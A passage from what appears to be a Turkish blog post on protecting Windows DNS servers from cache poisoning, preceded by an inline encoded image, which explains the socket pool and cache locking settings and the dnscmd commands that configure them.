/\/cvHBk1bdd+8hteW6lqrWUVEfyounvBrqWkaNS5yuRZubqvJbimRKUfeWtc3CxKR2mFhVV24g1xBwye+3prmWuNhL5KcamjHVJyDY3q1485xhi6flMtwnMG80RYRAhECEwMeHgOgYWsTJKSKs7xq7Jk+7nibf4AWYIRKSjFE6rXSL4kZjUugh1uRqYk+rFCkfFmO0FsowCCBGirTn+6zScQMnwmEd3qNJ68JY4pVLXEDkELyMbtTawyxoSkNxj6RiYymLbIVwTNmC\/ZnBDEwsiKVPosWwz5KkYzT7aSTJSggiRchKe57xtdQUYxKSlEOeMskk6RRJz7prH89I7JMwvhBKkIEzwaGOTNIQQQjFMBk8rfFw8Ggjq9377HXHeT\/qPujM773aY1NjmcVNumls1NBrHckoqRikqQ3mhWjWaQOISBvC+auOEXhZK\/hZGPGYHMM8n4CE27toZ\/YJQB1NESEQIfCJIYBFv91cguPsFDG5jO2U8HUsWICx7GPllSAeQziyM0lNTRprs2\/sQhxT4DPjJ43vYyUny2c+MRPFjGLLZ6TTMQM6IPCZYQO60oZTWvjYqhQwuNMGVU1aecSCHOGQiKWlgymZg0BMKK06IhmDNhET3IXjk0hqzCxJuMYI39IXgc8YdKGx3Ux75GNSjsNdgEiMpymVpIDPDHtp7Rs8LHwYfMZaEAlMnWRdTyYVzkQ2e0KtsYEVSuPBlFpatclX1eQmkvVrYwkvzylyhZNmn1kx4zlZa6HJ8hkJIdkRmpVnGKBpw0oKHRdaSMxJikkRC+RPUYkQiBCIEIgQ+EAIYPFuNw4LLZEmxjLOWMMNGyMgmoRhJkax\/\/hLMHcqttuOZRuBMUQQh4KxhEWeOJwtE9YgLFlnbWvMa7QJhQyYQ7OtDZmgKGN0YGQtbGiDYIZJBxERVxgCUwqCmRhthoMhCgQECAl1JpuTJPCoiNkaGztrYYzEo0K0lqghRMKGYsbdSmBGVkawkZKkIIEuoUBj0rTIlMeKLGRsWmudfTBWhrVBD\/IUZASBMyGKCA+FZwzuOsiWPq2aohIhECEQIbDLIiB22cyjxD8PCETPECEQIRAh8FEhEPHZR4VkFCdCIEIgQiBC4NNEYBfjMybaRYWCsosmj7SD9KPqU0YAX4hdVD4l4KJpv1gI7GJ89sX64kRPGyEQIRAhECGwwwhEfLbDUEWOEQIRAhECEQKfYQQ+aT77DEMRpRYhECEQIRAhsAsjEPHZLvzFi1KPEIgQiBCIEMgiEPFZFopI+RwgED1ChECEwBcXgYjPvrhf++jJIwQiBCIEPk8IRHz2efpqRs8SIRAh8HEiEMX+bCPQkc8McShkFfunmYz9m1QSRrLFMCkmzWSYjWBihtVk\/iKVQUETAqsVjLJi4E6kMwInOyD840\/oQSD7p7GYmOycrNmKHSPI\/n0oNsb+AV+kYOeTTIJNMC2RgSAC4RaIpkxUg4H271IhJNm4eMxAtQMMsg1G2jsZjEcXQkuyf9qLjSajMN4zbrORaXQbI41JGOMEoSgoNpAdbxBNU\/B3uGyTrB3h2oQNQQSSgSArK3guUr5JJ+0f8GLHKGHSBHwYWQTRoypCIEIgQiBCYGcRwELfbog0OqaU9LXxjSDlOr4rjGtVbdIpGNnEyK77GqQjtDQ+G48NCVdKR7BkA3EEVnllfJ+175JCUwgppXAFCyGYXUmuSzEGlyiftCFQjiLyDGsh2TVK2j8jDF6Du+OKeMIghNO\/tG45XDVZDsGFUUzMRsBgkIdg6SJToZWNKKQ0Tly7hUZIYTzyUybVbLT9i8fCcZ14TEgpNDLQQmDu8IENSUmSSGpSgpLxrkvLNahGtJDT0C++CB2W7Tzf1kIS0jUpEJERwogEyULBjks+EtBp1gAQxEjScII0emJ4IK2UIcPI2o1TooRqq4z280s3JxKOkTHteRSVCIEIgQiBCIEPhIDoMMrROq58qTT5JEg7ls\/IheprSqVJQQv4DEygWYLYsO77REY4UkqQFYHPCOxDWPJ9j7RyWUtmISzbuZKkkESu5FiMY1KDMRWBmhhTMfhMKJbkWC5Js9ECw9gFn+WRFOOnfv+tJyYRG2IydgwmZSbBJKCRselKN0Y2lDZEQgrjxMktIIF0fFJJSjdhV0RCCNdxEnEpJUYK1izwAIqMQmSkTpJYKtKCWmJb\/jq+bu5fzfzpZuGt907Ym9ghTeQpwgTsIBEB4oJJSJIxIwuEcBwAB\/RSTL5FxyCcyDOaLYMTE\/jMGBZoJiivmLrvnn\/sT95+7I5rY5sTnCYgRrtSuWHGHY1v3wmpm3PjI8cBlE6SN+b0V+e0us04PeuRM3byDabzsVnnSIkQiBCIEHhfBEQHD0UiyXGvZXO8rMj\/0o+qX\/9z07v3rVnwM\/PPq\/6QT7S70E5SY7kX7LPyKG2X\/hhJ1kYpLOMeOZ4hX+HAzhB2LeykKQZ6Ye2h9shBLbSvdTqt0wpxYoKEIeUL0lKCwMBXhl2mPFADFjmlvHS6pYWUViwEM9l8M3RGKAY7HZiZHFCc73tJMpqkI4lZGfJSlGoASRgjSbjkxlkgX8T0W1K+ry2vaEK2ZDCV0QwK1QqcSr5D2KIVpLqfP63k0At5wMT\/riusMy5b9iKSLoHQdFIz0CjUiAye1zFq2euFp\/70r0ldaPU7VMAUFxpPZBT5Sfiz7yNfkhK1VorSLdRSR45Cii4SS8VIu+QgMvp3DTHHTTixsur2fc4s3PeskhEXn\/gYd5o3892jRpwLn3NfrMt1uGSsNRZcMa861xrpEQIRAhECHxQB0WGgz9ITcVNU4R12\/oY\/DHnjwZ9y+ZE99v4lj\/vtj+NdnZcKjGwh4YMviO2qzNKPxUgKY5RWholdrdnzFVZwEoKE4zP4jMnymfHYAXGw9rXxPJMyQlNMWorSSrBxJLMgTUa47OYL+\/8yI1\/7aWppJpXhM7gQBykbzAB+gwjBzJJwcKfSLay1KxxJjCEMIknXkwLDOmyDxiQLB7N7ilJKg88kMkBuRNDJSIxFJorIc0gayk9v7LuSauvi7siWdEPPvBSOViWTCz5jTTpJLLRTSAwu9UluJNFQQ\/XgzMKBx3E+c5y1lIK0gzTYkOUzQ9IJUlPktXCyzpFAKuU4CU6Cz4CjGzzbLlLtW1pWU\/PKLpLsB0wzGhYhECGw6yAgOqaKU7Q4d+950EM\/qlzz\/GOHXVJT1P\/Lnm4h9kjoLqOM1heuf+quDW\/eZt56WM84Q7sD040nP\/Huj+74\/c36zd++OvGI2XN\/bebedI466vE3Ji\/43V+Xvn6DP32PK\/7xkPe\/q6d\/U1Ei9Yv7bqpa9oB55Y7kwhmbAru9xQAAEABJREFUrxxF+u2iwmOffeLm\/07a7+4Hbmh5feq7D\/\/4eLM5PzlA6X1mPXRtw7szat\/48zndZQU1mRT2aoqEIDAEg6jSxiR1rNHECjl21lOzb1y27IG1b\/xf6q3Jt3+z3qz1Eqde896cBxuW3ls\/\/6F37z6iy6bi5O\/\/1PDU1\/\/++B\/Nc9f+7KQJK5ZMXfrwj\/cuKDv6zgeTD4+94d4bX3z2PrXy3sWnz3f8cmouBC9JJ8nskpFGsRZ1dgeXuOy\/M\/+8ftH9qTk3N964J5nSX15\/Xeqdc\/sUioOPmr5o8YSW5\/++4KhaauqtvNf5179PLbin+fnJy+bfPvuYPKdscU8n\/7ApD+rFd1U\/ecOKCwcuKHnGcZXAbpV0xy8H0ak339gYnOmhXn7z6NABh3Wd6tgzLc8e7s2acCo+PhCZ3BO\/OW2HewiCmJC6rOcVk9EMpa71bHDrmKGl6ZQ+stuwO+b+Bf5hhMCeiZ+rhzm\/b22umFyXkx78kWE2DTQjiRCIEIgQ2A4ComMfdhRx3rhl9916eXLDvwu69G3ZsoDAZ+ThdVnT2sMf\/dceG54bP2C\/H5SOuPGpLkcv+n1Pol5FNYccU\/B3\/mfdyDO+5F86a+ZGcepxjenk0D6Vs3b\/+eK5I644\/PUTblw3ZHi\/JtUQe+ORR3vsfrw75kcFv38977ijb9L7NiTr1lTIytPOKrnlAneftxr77z7pl2X1auH3fvuT\/fo2nrbXcV32\/cvGnr3BY5ROslLYGAV85huT1tjnURfyvvLk7IP3WP\/W3nudULHP+bz3xO8+2K3nbqfOu6z7nInn5\/c9teTQh\/WIHz5xUyPVK87\/Wv4fT\/\/t5q6Xf59\/donTvVf8gFrZX9Xr\/kfs+eb3vnr4yLOf2tz3py\/8JqWomWOccMBnwiWSBD5TxbrlwHuf6l\/68sSeu30tdvBfHtn3ytcuXX\/15X+Ij7pvbb168eGxlYOuTBx9xJ7\/kUyrnV89vXLUyu8MOi02\/PcD\/7bwy5dfdVrNmPVfPffvR668+6IrSsZcdPGawqPqR7oxXwgN6qH2BVQ04UCadYU90yvc96zK8S+172\/XAoWsmDx084xz4AkpOXLqfcyI8NqbY7q9Mg0WSMmIiZcwYxio4sRNGeP0mqFTbjnYmNGPHlmx4P7MXCVj74Yb5MazhlJ2eBCTH5taOeLcgvvXqM3zzg3PGwM7nD+M8JSJ05dXnHjLwWEQPA7OM6ef\/LewGdURAp8\/BKIn+mgR2IrPcBbXmCZR3dKYl9d9MHFS2OWvkHzH4IzugCFDe8Qe+M0rzcqr1XP\/sb6my8BeZ\/dOyi0L\/\/Sj2cVFQ\/TbS77yxKusK1qoRPgND97yx+KSLi0bVt7+q4bNW2p9vD3qz8\/U77v0xVtWvfwH\/7L+DXEnhZM95ckVa9+94\/yj396bUrOr6hpVksrLhn7vAPPyfb97Jt\/Nky8\/vDJV1ZLQ8bhxXGbBJMhIwrZJxqk0P3HcsC6xhhX3\/KupKk3SYbyTY2\/9XWP7VdfMuOuZgm7lqmH20y8uOeCEM3FOuHLF0u8+2lRaUfLK\/659vmFBQ4uvYs0tRs17feFxU5y0\/MpfHliyWtZUfLUkXhnzNF4MeqTSOJdkyaK8MP+kg46pdvf61lUL33vSe+mM03qJ7pUn0cYlnEw7mvEyLCVi1BAj7VBC3ka7lfU76F5sENdNMkcN3lTROKZm9dhxA\/3GFec\/via\/2+DHn3pz5eZ12uSTcbCTovYFL59eWF545JS\/hBug9p0dW+OO71dWs2Dqde3tVw4ZQlWPfP\/FXCtI7pBK6n7w+dhaQc4bJMvKBzK\/dO\/ixqGn\/KXDJuniOVXw3M5vfORG\/pD6xXcuoAOPDX89BDy6ecZVIft+yLDR8AiBCIEvAgId+UyktWhKk9iStHw2hLlFsHCogJRDKZ3avWde89reqdGkcPy4yqsvNsWDeX19Yc9kt2S8vmZJneMVqC+L\/JXNboPwNvSOu\/VbanoWr\/Ubevce6CgpxLNnPHXdoNSzV\/Yaeg7\/cFN9XCaFQbQ+5XvlJ0iseja\/qCLp9cPLqc3pIfUmuafMa2xwWxxON71XRB7F4+Q6SIlZBnyGd04JWrcp2VRdEquvVw3UtRcJxxEUFx7NnV\/vbIn12aepsZnkWyrRZ001gc+G5Nc2xPoml9fktai1xV0bkr52W1q03rNwRTJWxi3LqVymWmrWvVCVWlWvtVbaR4YYSY7QG6pT6eSivTe+OGHy3oPPzzvgAu71zaE\/fi3RpadMpl1DbixGIk6NMVIu+GzZAVU0d3ZirzO67P5DHnNu94HX\/bBXhdnid13\/XktBkV6+yEuVtBThFWO+IcdOsdU3Xfh7E8WzSnGy99EevmW3YnbfFuzG7ht\/MfTiiTUnvjkty6DYNlnj8NcrJk\/rQHVbJfthDdj5PbLcbtHs5qx0K27+sOGj8RECEQKfZwQ68pl20zq\/uU\/V5iPnvt6r7\/EP\/3m\/0ry5vmqM9+1BnF928z0L8vbvMWl5eaybrP\/B4Xs2uu\/+dZpTuiyd8GJYkJt1MkVKCWJy4jpeLERXIb006CA\/XWBgp5LrCvfz3Jf+W9PdLRPDVxXXFh+W6ipM6VpF+SLBwk0K6armtCaz\/OG1a3Tvk34gPUPJM3+8d8+S7l0dYwT2S76HXRORwXGawDun2nz576VNq\/c76pc\/+f4WTG+8nkNSiW7uhX9b3b\/fod8ZItMLqf78L41MNcy8CpkZN0WxAunk5YF40loKx\/f8mOM0jRp5fW1xakDjb77Rb8\/N5c+mWihuKCbAd77Ia1TVSmjRXFDw\/NLN7w3c+7JxeV2q\/eY05TvNLW97hUU+1y7p27tXeX9av4hoj+5qvaqpvmVORX2f7jO+tlEbAY51Sri52X+4sSVv6Ik3es1J\/t+fTxvep7x7SoM4fTZuh+81c9zo8B0YSKXginnVpd3DJtzKygeixts17K6gQO6duaq61J4cQm+T6xYtooqzHzqjzUIUbPtoyJGXZqMRYXM4+tTgd+5BKgOGz15UWnpgrpHvHjl82uyaosrj4bsdsQ7Y\/702eWjZdry23XXxybM3H3jKiglDN8+6HueloSNerWEfmX1lGBqjOkIgQiBCIBcBkduwuutRQfOaLm87F\/6x9IYFlXv\/7O1nXm2Ze0f1g+fMOjapBi8+avCMYcfOXvP2bZvWH3pC\/fzyCzewSPdK+n7MFDtNJpVkXwlmdhImXiRk15gT8FlBqoB87MRapv\/qz8v87\/zh4aVv3Z48sPuzVTUD3vzJdTo1IN1QIMBnMS2loxrAZ\/GKgh+Me\/w17rVp3T01cwesfLdu02ZdQuQqRV6atEK2TEaCz0qN8p\/b\/7BJLzQPm7jlrpoF92z4zwVvX7nB2735iAtrz7jomqolTy6ad2TimVuG3rdvhs\/cfMdJgEEp4DMFPpNOcmHzsFXXb3747h\/vp2\/9znWz08l4XFOMyQdH5jXpapJa9CDtvnDs8de+njf8veceMq\/dVT3n9tUPjlNVbxPXnv3o4qIxP9eb\/2NW\/Pbhq\/aNlRRtufK4njPjR\/1+Zss793uv3eo995vryxxz1TX\/N7\/2rNf\/YZav\/5L31qaadeAzYzx3Kz4jGj3lzWlYyiH1k\/vNm5pZ4i++c0F15RgYp9D9ty9RgAJieWgizuvOgR0S7qVAXSNBToFzYLwx\/Idi2PZNrxmKPR+MkLoZpxMNnDA5M1fT3CNpxlWXMCPsuAlZ4\/nDFt+\/rd\/LhycSeGS5PR2tf3PICxMXYDMM484KEp76CpXVzB41xc6+s8Mj\/wiBCIEvLAKi45OrOKW7EMUpphr+\/vf9D7mgYuS5efud3e+kO055OF67spYLnxq83yHFh57fdeTELsfc7YoyZ\/1dXxp78VV+Hl\/4wsCzn290rvnq6Ct\/98\/FJ44c\/5UnZsX\/\/tAxY37xaG3x2MN+etR1zclkz0vOOLv3gacV731qj2MmnTZ26m4HfPeXefNHHH3Bodc09qjYR1T965jR3zn6uobSyr3IfeZLw48pP\/DCbl\/63bjxv+557IRmLTQLkoIFE5PW2leaWJHjFfXwvvLlk3sP+07p0NN6HHzt8Is2uk5h7VNTYhX7dD\/0R0OO+vXwc94sqEno6y6KjXu7qHbeBceMG3xDc78nL6scfcPL1K++rtpR6a8MPqr7gWcUfuknP3v53WbO97RDni4sT5181PGXXX08ad\/30slkKlboHztmXI8RJ\/MBZ5SN+mmfE\/5DPfam+OLSM35VsM\/pYu9Tec\/Tv3njwrTobTY2xm76Zdd9zsnb69TYgd\/PO+LnV7\/6LpEz6Sd\/7jHolJ4jx+9\/3o2Voy6dLHslWSpOdvhygCEqg3+8hRO\/3H\/jlbVXjn8JzIQ6HJi1B\/6ZX\/0AQ4zqLAgGwi2UkrF357rBGNIJXqqdeKT9h2KwQLITYTpsGcNfOYGelTBmyYiJl9jfGckkEPbiMBOzhHq2DhJu54aTxikH0uw72\/0aCObqMHs2wq6lRNlGCEQIfHwIiI6hfctngmMUV07BhoZYNcU8HM1t2bR+c2EzFTgO1zuyj1+\/mWrWU6IxlazyytKNG7ok0\/V1ZW\/Wcz0VHkqOfN1bJbiOkgPqyjav5jLjNDmJunrpxhM1eT7X1xkiU5NIKNPEotLzmx2jNxm5bstKXVZIxSVJV6xfNkd6ScfdQ26s46ZmqWpNt0EtWigWriME+AwhjNFKE\/nk+A0tS4jKqEVIw6Jxiy6u8FPvCddwxT5U18g1q5W0b+WceIzqFjSoApIeNbur8rtzD7XGrO3apcjV6YLY7oq7qDrVUNlHUb5WktKquWmh4xa+U\/AqGY+8tJ9MeZuXxqmn8mOUcMjUieJ8UV8r\/K71\/Zod4ThGuaqlpqnEbV5N3bu1NKbT2svHVtKjZDM1DepF5NZv3JAsMZubNnGqxdW9fGJJLZpTHb8cX6Q2mGz5nDuapgzbPOOi7ewCv0iQRM8aIRAhsBMIiI6+TMSaiAwJrUn5pDUbFna9ZZfQZ7SvtfINaSac9oFZHCYpSTgENxgxlLTdPJEgiGF0G+FocrRxNUuCM0QI22uDs8ahocDGSzILCTNLIpelI10MJZ+1kVopbbRBLCLC3RBTKEzMUgqX0GcUGQVP5EwE0pOuQJHEDgmXZIzZYRNYpCQIMxtHqHi3vv1vO2t85ZfPJT9FCkEMoUgmIViw1sZPaeRBxiXEcR1rRDYaRkOatLYxY65EPN\/XEM9TniZFghjCRKyEtP\/eHEeDBsE1oVYGMGnpaCmNtHkRS\/oCl2CvZveC4dbwC4xE9OgRAh8MgS\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\/fC0MHad+\/vVbUFyEQIRAhECHQOQJb81nnfqE1dxkGLYQSdn0CdTj7+04UuoV11hnNXD23mbV3UOADgRF1KNC3JaFDp3V2SKe9WWPWLVIiBCIEIgQiBD4AAtvmMyy0W8UDgcGGGgLlg0nu2Fx9W9FyfXL1Tv07y9o6dhjYoWk9ci4EgeQYPl4VyUA+3jmi6BECO4JA5BMhsCsjsG0+w4mZlY4P95GsvGGQsO44QWft0DOsO+vP2LZDQtvpwuDc3lwdXVsL0thB2Xps1oIIWT1SIgQiBCIEIgQ+PAKd8BkW9FA+fPTtRNjZBX1n\/TtM\/b7Dw0dG3WHgR94MM8FEUCCIDz0raEYSIRAhECHwuUTg436orfgMS2woZHdn4TpLn+0SJol6O2m29uJuBdd2nD\/WrnBqYBwo9ldnoIfysc4bBY8QiBCIEPh8I7AVn4WPG6y1oYq6fQuGz5DsYG7gjeA3KYN\/XGdsawefoUN8EM8ODoTb1s6hJaiRQ3CHX5BZh4msOboiBCIEIgQiBHYYgW3wWXal3eFAn\/xyjBkhZLeR1K4geUjWBN1knYIRaJls984p4fgdHLO1MyyYGXWHCFtbOjh8XM0oboRAhECEwOcFgW3wGWPJ7\/QRsRqH0kkvd2L7uE3hnGx3OJgqN7VQRw17+38DF9haBwa9nVbwgKArrKFA7Fhc7ytwbT9pYMhUwSYx0LNxglZURQhECEQIRAh8YAQ65zPGOkvtKK1tTQ+6qH3J9maV9v0ffSuYKKiQDwTJ2rptIvR1EIIP5RSD\/pxmoMKUlcDQsQqR6WjdmTbit3cP8g6q9vaoFSGwyyMQPUCEwCeJQOd8Fiz1duHFFQpygkKWErAZgmCPEYjdGeFVUHDruCPBIt1OECErtJMFAzMjgpB2ynBOdIBkrJDNjjIlkxyzsX+nQ6A28Mx2kibWhhTccrJmY0PALyt2gLGVvTCp1YNORM342p62i5mt3RrgG46wijW0XvDICMOEARQMQYLwpKhECEQIRAhECHwABDrnM8sUrcGw5IK+UOcYQhXrr2a7YoMUtl6IAwuqUChYsdviYhG3kjFTW8mZKAzbNh5dkIB+YMz+qX2rh+ODXqhhTq2TtVIahylYc+igCaxGYDVDlsgYI5ET4YKgYcUa7Z1ap2NiahOyxaAzEMK4sDdsBjXmCu7WE5ftZ2JogUBhYmaiUCgqEQIRAhECEQI7hEBHp458hrWZsLTaBZZQsMhirUcLSiBBhQ6CU5ZvyBas25CALez6jUCQ1ib4Aj7hYMZQ22BU2xY72PbiDiFwJwXjbINsZS9CQRgIlFDAvaFik4Ej+phY4CKMZwoKxkIyfIZs0bB222svsp6hQp0WZrJC1DqbDcC2SSitCowQhIctFAzCEKuzvWM0k1UIxWohTGhEEiEQIRAhECGwkwh05LPs8GAlZiy2TKjIrsSUUQNDuExbSrNbNBAHBSUYFmiogkbAK\/AOB8MKYZTgZkMGF1pZgafVg9FWwQWd2\/vB0rplQj\/62N62umBlJrbnjfCh4CIUyxyaWIGtrWTzR1fGB6PYtoIr8xCBHlbMnHEM26gZF8Fsb5kLWYaSaePG1oUprOHNzIHOMFFUIgQiBCIEIgQ+IAKd8hmWYM2kUZRnfM2aBAkhHYmll4xPWpHSxjCzQ8Ihx2Eh2S7KQRIG5GWEEI7jCikxkAwbn7W2p3u2k42lQfhqw3iBBYUFoUMpMgiKQCyExM0aMYkQ0I1R1pEdJoEJAhIiptaCiNaKKJDAyEEnWgZ9GpENCm7WLbgMJhVkH1SA3VzSpI1WWiMrGwCj7C28wmDQBbMQgjE9nLUxGqEQQrFRRvvGFgSzicOZiB3hJNy4IIxxjWHEVzqIbBMjFEaAjAAXtGDbhSVKPUIgQiBC4NNCANzQYWpDjAUa67QirLw+kcYuBvsbCUIjrLfgFUtNhghjXZIuOS6HazyFy75dr2FxXPCZpToCcyjwo13lDQc1GeuESmnbFghlwJHWzLYIFkyBK0ETzFjrkRJ0h5jJjmlNG4nYWDAhHGoi9FNQGGrYjbGQQA96CD0QJAbRdvvmYCjYyTeEpzOG4QsLtRVMiyyYSDIzMjDG9tuoRgITiFLGYDDM6A\/EWD7Lc+IMONglAn1ilA3NbYFt05CdUFOOuc0h0iIEIgQiBCIE3h8BEEk7p2BBNcwsBdZt9ArLMVoZ5RuVCtZ6wUJIyZJIgPCwiGsP6zgTcxjJ4IZ1XfvK19iykE\/ogDsCCkmtXmAEZuy2pIQ7NnyooQoBX2OM7\/sG7CLArDYcOsloWAxpDAwWf9gNgVQII9CPZrYm2JiYKSjWJ\/TMaIQuPCJEC0JKrmMEe1obJBmLkZQBkYYBQU4UFhgRUDCeXjChBbMh1mTncZkF\/iOrw25zJMNE7Cvd4nv2o4HnMZwTTA5b7qKwmPCG2hA4G0OgRhIhECHQKQKRMUJgewj8PwAAAP\/\/g6U7jgAAAAZJREFUAwD8QjzVjIbEewAAAABJRU5ErkJggg==\"><br>Bunu de\u011fi\u015ftirmek isterseniz&nbsp;<strong>dnscmd \/config \/socketpoolsize &mdash; &ouml;rne\u011fin<\/strong> 5000&nbsp;i&ccedil;in &gt;&nbsp;&ccedil;al\u0131\u015ft\u0131rarak yapabilirsiniz<\/p>\r\n<p><img src=\"https:\/\/mehic.se\/wp-content\/uploads\/2017\/04\/screenshot-214.jpg?w=616\" alt=\"screenshot.2.jpg\"><\/p>\r\n<p>TimeToLive de\u011feri s&uuml;resi dolmadan &ouml;nce ger&ccedil;ekle\u015febilir; baz\u0131lar\u0131 sald\u0131rgan\u0131n &ouml;nbellek giri\u015fini &uuml;zerine yazmas\u0131 olabilir ya da sald\u0131rgan\u0131n ger&ccedil;ek TimeToLive de\u011ferinin ne zaman doldu\u011funu g&ouml;rmek i&ccedil;in sunucudan s&uuml;rekli bilgi talep etmesiyle ve &ouml;nbelle\u011fi kendi yanl\u0131\u015f de\u011feriyle hemen g&uuml;ncellesi olabilir. &Ouml;nbellek kilitleme, &ouml;nbellekte bulunan bu giri\u015flere ek bir koruma katman\u0131 ekler; &ccedil;&uuml;nk&uuml; bu giri\u015flerin t&uuml;m TimeToLive de\u011ferinin bir y&uuml;zdesinde &uuml;zerine yaz\u0131lmas\u0131n\u0131 engeller. Varsay\u0131lan olarak, bu %100 olacak. TimeToLive de\u011feri, ger&ccedil;ek girdi i&ccedil;in o d&ouml;nemin tamam\u0131 i&ccedil;in &uuml;zerine yaz\u0131lamaz. Bunu TimeToLive de\u011ferinin bir y&uuml;zdesine indirebilirsiniz, ancak %100 asl\u0131nda varsay\u0131lan de\u011ferdir. Bunu ko\u015farak kontrol edebilirsiniz<\/p>\r\n<p><strong>dnscmd \/info \/cachelockingpercent<\/strong><\/p>\r\n<p>&nbsp;<\/p>\r\n<p><img src=\"https:\/\/mehic.se\/wp-content\/uploads\/2017\/04\/screenshot-2411.jpg?w=616\" alt=\"screenshot.24.jpg\"><\/p>\r\n<p>&Ccedil;o\u011fu ortamda bunu asla ayarlamayacaks\u0131n\u0131z, &ccedil;&uuml;nk&uuml; varsay\u0131lan olarak yap\u0131land\u0131r\u0131lm\u0131\u015ft\u0131r, ancak bir nedenle &ouml;nbellekteki bir kayd\u0131n &uuml;zerine yaz\u0131labilece\u011fi s&uuml;reyi azaltmak isterseniz,&nbsp;<strong>bunu dnscmd \/config \/cachelockingpercent<\/strong> ve ard\u0131ndan belirli bir de\u011ferle, yani 50 veya 75 ile yapabilirsiniz, &Ouml;nbellek kilitlenme y&uuml;zdesini ayarlayaca\u011f\u0131m.<\/p>\r\n<p><img src=\"https:\/\/mehic.se\/wp-content\/uploads\/2017\/04\/screenshot-256.jpg?w=616\" alt=\"screenshot.25.jpg\"><\/p>\r\n<p>K\u0131sacas\u0131, &ouml;nbellek kilitleme, bilmeniz gereken ama muhtemelen asla ayarlanmayacak bir &ouml;zellik.<\/p>\r\n<p><code>&nbsp;Not:Havuz boyutunu art\u0131rmak g&uuml;venli\u011fi daha da g&uuml;&ccedil;lendirir, ancak &ccedil;ok fazla art\u0131rmak nadir durumlarda kaynak t&uuml;ketimini etkileyebilir. Varsay\u0131lan de\u011ferler genellikle optimaldir.<\/code><\/p>\r\n<h4>Socket Pool Etkin mi? Nas\u0131l Anlar\u0131m?<\/h4>\r\n<p>En basit yolu, sunucunuzdan &ccedil;\u0131kan DNS sorgular\u0131n\u0131 bir a\u011f analiz arac\u0131 (Wireshark gibi) ile incelemektir. E\u011fer recursive sorgular\u0131n \"Source Port\" alan\u0131 s&uuml;rekli de\u011fi\u015fiyor ve 1024'ten b&uuml;y&uuml;k rastgele de\u011ferler al\u0131yorsa, Socket Pool aktif demektir.<\/p>\r\n<h6>Bir Di\u011fer Silah: Socket Pool Ekzoz Korumas\u0131 (Socket Pool Exhaustion Protection)<\/h6>\r\n<p>Socket Pool'a ek olarak, Windows Server 2012 R2 ve sonras\u0131nda bir ba\u015fka ak\u0131ll\u0131 &ouml;zellik daha geldi: **Socket Pool Exhaustion Protection**.<\/p>\r\n<p>Sald\u0131rganlar, havuzdaki portlar\u0131 \"t&uuml;ketmeye\" &ccedil;al\u0131\u015fabilir. Sunucu her sorgu i&ccedil;in yeni bir socket a&ccedil;ar. E\u011fer sald\u0131rgan &ccedil;ok 